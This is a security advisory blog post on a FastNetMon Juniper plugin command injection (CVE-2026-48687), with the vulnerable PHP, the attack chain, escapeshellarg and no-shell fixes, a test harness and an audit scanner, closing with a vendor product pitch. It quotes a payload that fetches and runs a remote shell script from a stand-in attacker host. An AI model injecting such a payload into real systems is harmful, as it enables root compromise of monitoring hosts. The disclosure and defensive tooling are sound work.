| CVE ID | CVE-2026-48687 |
|---|---|
| CVSS Score | 8.1 HIGH |
| Vulnerability Type | CWE-78: OS Command Injection |
| Affected Software | FastNetMon Community Edition <= 1.2.9 |
| Component | src/juniper_plugin/fastnetmon_juniper.php, _log() function, lines 115-119 |
| Attack Vector | Indirect remote via DDoS attack notification pipeline |
| Impact | Remote code execution as FastNetMon process user (typically root) |
| Discovered By | Lorikeet Security (April 25, 2026) |
| Patch Status | No vendor fix as of May 23, 2026 |
| Related CVEs | CVE-2026-48695 (MikroTik plugin, same pattern), CVE-2026-48694 (Juniper NETCONF injection) |
This post is part of our FastNetMon CVE series covering all 16 vulnerabilities disclosed in 2026.
What Is CVE-2026-48687?
CVE-2026-48687 is an OS command injection vulnerability in FastNetMon Community Edition's Juniper plugin. The plugin's _log() function builds a shell command by concatenating unvalidated attack notification data directly into a string passed to PHP's exec(). When FastNetMon detects an attack and invokes the Juniper plugin, parameters like the attacker IP, attack direction, and attack power are interpolated into the logging command without any sanitization. An attacker who can influence these values can execute arbitrary commands on the host system.
The vulnerability was discovered by Lorikeet Security on April 25, 2026. As of May 23, 2026, no vendor fix has been released. CVSS is 8.1 (High), and the vulnerability class is CWE-78 (OS Command Injection).
Vulnerable Code
The vulnerability is in the _log() function at lines 115-119 of src/juniper_plugin/fastnetmon_juniper.php:
```php
// fastnetmon_juniper.php, lines 115-119
function _log($msg) {
    global $FILE_LOG_TMP;
    exec("echo `date` \"- [FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP);
}
```
The $msg parameter is constructed from command-line arguments passed to the script by FastNetMon's notification system. These arguments include $IP_ATTACK, $DIRECTION_ATTACK, and $POWER_ATTACK, which correspond directly to the attack data that FastNetMon detected. None of these values are escaped or validated before being concatenated into the shell command.
This is a textbook CWE-78 violation. The exec() call treats the entire string as a shell command, which means shell metacharacters in any of the interpolated variables will be interpreted by the shell. Backticks, semicolons, pipes, and subshell syntax all execute as commands.
Attack Chain
The exploitation path is indirect but reliable. The attacker never connects to FastNetMon directly. Instead, they manipulate the data that flows through FastNetMon's detection pipeline:
- Attacker sends crafted traffic to a network monitored by FastNetMon. The traffic is designed to trigger a DDoS detection threshold.
- FastNetMon detects the attack and extracts parameters: the source IP, attack direction, and attack power.
- FastNetMon invokes the Juniper plugin as a notification script, passing the attack parameters as command-line arguments.
- The plugin calls _log() with a message string that includes the raw attack parameters.
- The exec() call concatenates these values into a shell command. If any parameter contains shell metacharacters, the shell executes them as commands.
For example, if the attacker can get a value such as 1.2.3.4$(curl attacker.com/shell.sh|sh) into the source IP field, the subshell expression executes during the logging call. The command runs as the FastNetMon process user, which in most production deployments is root. Before relying on this exact payload in a test, check which arguments your FastNetMon version passes to the notify script and which of them can carry characters outside the address and number character set: the injection needs at least one argument that reaches _log() unmodified.
The attacker does not need network access to the FastNetMon host. They only need to send traffic that triggers detection. FastNetMon's own notification pipeline delivers the payload.
Am I Affected?
You are affected if both of the following are true:
- You run FastNetMon Community Edition version 1.2.9 or earlier
- The Juniper plugin (fastnetmon_juniper.php) is configured as FastNetMon's notification script (in the Community Edition, the notify_script_path setting in fastnetmon.conf, directly or via a wrapper script that calls the plugin)
The severity depends on a third factor: the injected command runs as whatever user FastNetMon invokes the script as. In most deployments that is root. Running the script as an unprivileged service account lowers the impact but does not remove the injection.
If you use FastNetMon but have not enabled the Juniper plugin, this specific CVE does not apply. However, note that the same vulnerability pattern exists in the MikroTik plugin (CVE-2026-48695), and a separate NETCONF injection vulnerability exists in the same Juniper plugin file (CVE-2026-48694). Review the full list of 16 FastNetMon CVEs disclosed in 2026 to assess your exposure.
Mitigation and Remediation
There is no vendor patch as of May 23, 2026. Operators should apply one or more of the following mitigations:
1. Disable the Juniper Plugin
If the plugin is not essential to your workflow, remove it from FastNetMon's notification script configuration. This eliminates the attack surface entirely.
2. Escape All Interpolated Variables
Wrap every variable passed to exec() with escapeshellarg():
```php
// Patched _log() function
function _log($msg) {
    global $FILE_LOG_TMP;
    $safe_msg = escapeshellarg($msg);
    $safe_log = escapeshellarg($FILE_LOG_TMP);
    // The fixed prefix is quoted so the shell does not treat [FASTNETMON] as a glob pattern.
    exec("echo \"$(date) - [FASTNETMON] -\" " . $safe_msg . " >> " . $safe_log);
}
```
escapeshellarg() wraps each value in single quotes and escapes any embedded single quotes, so the shell receives the value as one literal argument and never interprets metacharacters inside it. Apply the same treatment to every variable derived from command-line arguments throughout the script, including values passed to any other exec() or system() call. Where the shell contributes nothing, as in this logging call, the stronger fix is to drop exec() entirely and append the line with file_put_contents() and FILE_APPEND, so there is no command string for attack data to break out of.
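The following is an added example written for this post, not code from FastNetMon or the Juniper plugin. It places the vulnerable _log() shape from the Vulnerable Code section beside the escapeshellarg() fix from mitigation 2 and a variant that avoids the shell altogether, then runs the post's sample payload through both hardened paths and checks that the $(...) reached the log as inert text. The function names, the temporary log file standing in for $FILE_LOG_TMP, and the assumption of PHP 7.4+ on a POSIX host with /bin/sh are all mine.

```php
<?php
// Added example for this post (not FastNetMon's code). Assumes PHP 7.4+ on a
// POSIX host with /bin/sh; a temp file stands in for the plugin's $FILE_LOG_TMP.
declare(strict_types=1);

// Vulnerable shape from fastnetmon_juniper.php: $msg is pasted into a shell command.
function buildLogCommandVulnerable(string $msg, string $logFile): string
{
    return "echo `date` \"- [FASTNETMON] - " . $msg . " \" >> " . $logFile;
}

// Mitigation 2: every dynamic piece goes through escapeshellarg(), so the shell
// receives it as one single-quoted word and never parses its contents. The fixed
// prefix is double-quoted so [FASTNETMON] is not treated as a glob pattern.
function buildLogCommandEscaped(string $msg, string $logFile): string
{
    return "echo \"$(date) - [FASTNETMON] -\" " . escapeshellarg($msg)
         . " >> " . escapeshellarg($logFile);
}

// Preferred fix: appending a log line does not need a shell at all, so there is
// no command string for attack data to break out of.
function logAttackNoShell(string $msg, string $logFile): void
{
    $line = date('r') . " - [FASTNETMON] - " . $msg . "\n";
    file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX);
}

// True when $needle is present verbatim in the log, i.e. it was written as inert text.
function writtenLiterally(string $logFile, string $needle): bool
{
    return strpos((string) file_get_contents($logFile), $needle) !== false;
}

// The post's sample payload, as a PHP single-quoted literal so PHP itself does
// not touch the $(...).
$payload = '1.2.3.4$(curl attacker.com/shell.sh|sh)';
$logFile = tempnam(sys_get_temp_dir(), 'fnm_');

// The vulnerable command is only built and displayed; running it would execute
// the subshell. Compare the two strings to see what /bin/sh would parse.
echo "vulnerable (not run): ", buildLogCommandVulnerable($payload, $logFile), "\n";
echo "escaped:              ", buildLogCommandEscaped($payload, $logFile), "\n";

exec(buildLogCommandEscaped($payload, $logFile));
logAttackNoShell($payload, $logFile);

// Both hardened paths must leave the $(...) in the file unexpanded.
$ok = writtenLiterally($logFile, $payload);
unlink($logFile);
if (!$ok) {
    fwrite(STDERR, "payload was interpreted by the shell\n");
    exit(1);
}
echo "both hardened variants logged the payload as plain text\n";
```

escapeshellarg() protects the shell's parse of the argument, but it does not change how the program receiving the argument treats it: a message beginning with -n or -e is still an option to echo in some shells. That is one more reason to prefer the no-shell variant for anything that only needs to write a file.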
3. Restrict Script Permissions
Run FastNetMon's notification scripts under a dedicated, unprivileged user account rather than root. Use filesystem permissions to limit what the script can read, write, and execute. This does not fix the injection, but it constrains the blast radius of successful exploitation.
4. Audit Other Plugin Scripts
The _log() pattern is not unique to the Juniper plugin. Lorikeet Security found the same vulnerability in the MikroTik plugin (CVE-2026-48695). Audit any custom or community-contributed notification scripts in your deployment for similar exec(), system(), or shell_exec() calls that interpolate unsanitized input.
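To make the audit repeatable across notification scripts, here is an added example (written for this post, not part of FastNetMon) that uses PHP's own tokenizer to list every shell sink whose arguments contain a variable that is not wrapped inline in escapeshellarg() or escapeshellcmd(). The constructed sample it scans when run without arguments contains the post's vulnerable _log(), the escapeshellarg() version from mitigation 2, and a backtick call; the script name, constants and function names are mine.

```php
<?php
// audit_shell_sinks.php: added example for this post, not part of FastNetMon.
// Lists exec/system/shell_exec/passthru/popen/proc_open calls and backtick
// expressions whose arguments contain a variable not wrapped inline in
// escapeshellarg()/escapeshellcmd(). Variables escaped on an earlier line are
// still listed, so treat the output as a review queue, not a verdict.
// Usage: php audit_shell_sinks.php fastnetmon_juniper.php [more.php ...]
declare(strict_types=1);

const SHELL_SINKS = ['exec', 'system', 'shell_exec', 'passthru', 'popen', 'proc_open'];
const ESCAPERS    = ['escapeshellarg', 'escapeshellcmd'];

// Returns a list of ['line' => int, 'sink' => string, 'vars' => string[]].
function findShellSinks(string $source): array
{
    $tokens = token_get_all($source);
    $count  = count($tokens);
    $found  = [];
    $line   = 1;
    $prev   = null; // previous significant token, to skip $obj->exec() and Foo::exec()

    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if (is_array($tok)) {
            $line = $tok[2];
            if (in_array($tok[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
                continue;
            }
        }

        if ($tok === '`') {
            // Backtick operator: the whole template is handed to /bin/sh, like shell_exec().
            $vars = [];
            for ($j = $i + 1; $j < $count && $tokens[$j] !== '`'; $j++) {
                if (is_array($tokens[$j]) && $tokens[$j][0] === T_VARIABLE) {
                    $vars[] = $tokens[$j][1];
                }
            }
            if ($vars !== []) {
                $found[] = ['line' => $line, 'sink' => '`...`', 'vars' => array_unique($vars)];
            }
            $i = $j;
            $prev = $tok;
            continue;
        }

        $isSinkCall = is_array($tok) && $tok[0] === T_STRING
            && in_array(strtolower($tok[1]), SHELL_SINKS, true)
            && !(is_array($prev) && in_array($prev[0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true));

        if ($isSinkCall) {
            $j = $i + 1;
            while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
                $j++;
            }
            if ($j < $count && $tokens[$j] === '(') {
                // Walk the balanced argument list. A variable counts as escaped only while
                // we are inside the parentheses opened by an escaper call.
                $vars = [];
                $depth = 0;
                $escapedAt = [];
                $escaperPending = false;
                for ($k = $j; $k < $count; $k++) {
                    $t = $tokens[$k];
                    if ($t === '(') {
                        $depth++;
                        if ($escaperPending) {
                            $escapedAt[$depth] = true;
                            $escaperPending = false;
                        }
                    } elseif ($t === ')') {
                        unset($escapedAt[$depth]);
                        if (--$depth === 0) {
                            break;
                        }
                    } elseif (is_array($t) && $t[0] === T_STRING && in_array(strtolower($t[1]), ESCAPERS, true)) {
                        $escaperPending = true;
                    } elseif (is_array($t) && $t[0] === T_VARIABLE && $escapedAt === []) {
                        $vars[] = $t[1];
                    }
                }
                if ($vars !== []) {
                    $found[] = ['line' => $line, 'sink' => strtolower($tok[1]) . '()', 'vars' => array_unique($vars)];
                }
                $i = $k;
            }
        }
        $prev = $tok;
    }
    return $found;
}

// Constructed sample: the post's vulnerable _log(), its escapeshellarg() fix, and a backtick call.
$sample = <<<'SRC'
<?php
function _log($msg) {
    global $FILE_LOG_TMP;
    exec("echo `date` \"- [FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP);
}
function _log_fixed($msg) {
    global $FILE_LOG_TMP;
    exec("echo \"$(date) - [FASTNETMON] -\" " . escapeshellarg($msg) . " >> " . escapeshellarg($FILE_LOG_TMP));
}
$out = `ping -c1 $host`;
SRC;

// Scan the files named on the command line, or the constructed sample when none are given.
$files = array_slice($argv ?? [], 1);
$reports = $files === []
    ? ['<sample>' => findShellSinks($sample)]
    : array_combine($files, array_map(fn (string $f) => findShellSinks((string) file_get_contents($f)), $files));

foreach ($reports as $file => $findings) {
    foreach ($findings as $f) {
        printf("%s:%d %s receives unescaped %s\n", $file, $f['line'], $f['sink'], implode(', ', $f['vars']));
    }
}
```

Against the sample it reports the exec() in _log() with $msg and $FILE_LOG_TMP and the backtick expression with $host, and stays silent on _log_fixed(). Point it at every script referenced from your notification configuration, including wrappers in other languages that you will need to review by hand, since this scanner only understands PHP.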
What This Means for Detection Tooling
CVE-2026-48687 illustrates a structural risk in detection tools that rely on shell-based plugin scripts to handle attack notifications. When a DDoS detection system passes attacker-controlled data through a shell pipeline, the detection system itself becomes the attack vector. The tool designed to protect the network becomes the entry point for compromise.
This is not a theoretical concern. FastNetMon's plugin architecture passes raw attack data as command-line arguments to user-provided scripts. Any script that calls exec(), system(), or backtick operators with those arguments inherits this class of vulnerability.
Flowtriq takes a different approach. The Flowtriq agent runs as a managed process with automatic updates, an authenticated control plane, and no shell-based plugin scripts. Notification and mitigation actions execute through structured APIs, not string-concatenated shell commands. The agent installs in roughly 60 seconds, runs at $9.99/node, and does not require operators to maintain or audit third-party PHP scripts.
DDoS detection that doesn't execute attacker-controlled input.
Free 14-day trial. No credit card required. Installs in 2 commands.
Frequently Asked Questions
What is CVE-2026-48687?
CVE-2026-48687 is an OS command injection vulnerability (CWE-78) in FastNetMon Community Edition's Juniper plugin. The _log() function in fastnetmon_juniper.php concatenates attacker-controlled attack data directly into a shell command without escaping. An attacker who triggers DDoS detection with crafted traffic can execute arbitrary shell commands on the FastNetMon host. CVSS score: 8.1 (High).
How is CVE-2026-48687 exploited?
An attacker sends traffic that triggers FastNetMon's DDoS detection. FastNetMon calls the Juniper plugin with attack parameters (IP, direction, power) as command-line arguments. The _log() function passes these values into an exec() call without sanitization. Shell metacharacters in the attack data (such as backticks or semicolons) execute arbitrary commands as the FastNetMon process user, which is typically root.
Is there a patch for CVE-2026-48687?
As of May 23, 2026, there is no vendor-issued fix for CVE-2026-48687. Operators should disable the Juniper plugin script, apply manual escaping with escapeshellarg() on all interpolated variables, or restrict the script's filesystem and execution permissions.
Does CVE-2026-48687 affect FastNetMon Advanced?
CVE-2026-48687 affects FastNetMon Community Edition version 1.2.9 and earlier. The Juniper plugin is a community-contributed PHP script. FastNetMon Advanced uses a different notification architecture, but operators should verify whether any custom scripts in their deployment follow the same unsafe pattern.
How is CVE-2026-48687 related to CVE-2026-48695?
CVE-2026-48695 is the same _log() command injection pattern in FastNetMon's MikroTik plugin (fastnetmon_mikrotik.php). Both vulnerabilities share an identical root cause: unescaped interpolation of attack parameters into exec() calls. CVE-2026-48687 affects the Juniper plugin, while CVE-2026-48695 affects the MikroTik plugin. A separate vulnerability in the same Juniper plugin file, CVE-2026-48694, covers NETCONF injection.